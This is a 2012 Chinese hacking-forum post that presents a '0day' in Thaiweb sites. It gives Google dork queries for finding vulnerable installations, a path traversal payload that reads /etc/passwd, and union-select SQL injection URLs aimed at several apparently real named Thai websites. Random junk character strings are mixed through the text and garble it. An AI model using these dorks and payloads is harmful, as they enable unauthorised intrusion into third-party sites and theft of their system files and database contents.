找回密码
 立即注册
查看: 2616|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
4 h/ Q, N! N" t" ^4 P% {% t2 M+ F. Q$ b( ~5 a% @; \4 q
intext:powered by Thaiweb
" f& Q7 T0 V% [2 W: D# G/ V; ^3 Z
inurl:index.php?page=board.php- \. M( F/ W: l3 p6 N
; H* H8 ]6 d: ~

0 w2 G" U( h6 C7 L
3 J9 n( v5 \/ |$ [, d! b利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd7 ]* v/ z* V( g5 S- Y8 m, ~
# \' i( P7 p6 o( I5 D: c7 b
. U3 U$ V1 p- L  j
- y9 o5 a, L9 q: w4 ~9 }
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
+ P% g' J1 @/ m, F5 B/ T
+ j0 n! Y# x+ v 7 z+ T4 `% r, |1 s8 l. _

2 j) }$ w! ^7 Z$ |1 P. }+ chttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--- V. J  b) A: N* N& A6 }
' j' ~8 d4 a) A. a# D+ M; T* Q% ^* m
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--' o0 A- Z1 J0 \/ @) V" d6 d
1 v9 `6 w( }! ], J! S* ~9 M) j) N
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ f% [/ ?3 E2 r, s+ l, W; _. d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表